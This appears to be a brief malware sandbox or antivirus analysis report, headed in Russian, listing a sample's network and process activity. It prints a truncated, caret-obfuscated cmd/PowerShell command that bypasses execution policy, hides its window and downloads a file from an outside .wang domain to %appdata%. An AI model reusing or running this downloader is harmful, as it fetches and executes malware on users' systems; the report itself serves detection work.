Техническая информация
- http://tolleyfrvdy.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOW^Ers^hE^ll^.Ex^e^ -^ExEC^u^tionP^olI^CY B^ypAsS ^-nop^RoFile -wI^n^do^WSt^yle hi^dDEn (N^e^w-^Obj^ECt ^s^ysTE^M.N^et.WEBC^L^ieN^t).D^O^wN^L^OAdfiLe^(^'http://tolleyfrvdy.w...
- DNS ASK to####frvdy.wang
- '<SYSTEM32>\cmd.exe' /C "pOW^Ers^hE^ll^.Ex^e^ -^ExEC^u^tionP^olI^CY B^ypAsS ^-nop^RoFile -wI^n^do^WSt^yle hi^dDEn (N^e^w-^Obj^ECt ^s^ysTE^M.N^et.WEBC^L^ieN^t).D^O^wN^L^OAdfiLe^(^'http://tolleyfrvdy.w...' (со скрытым окном)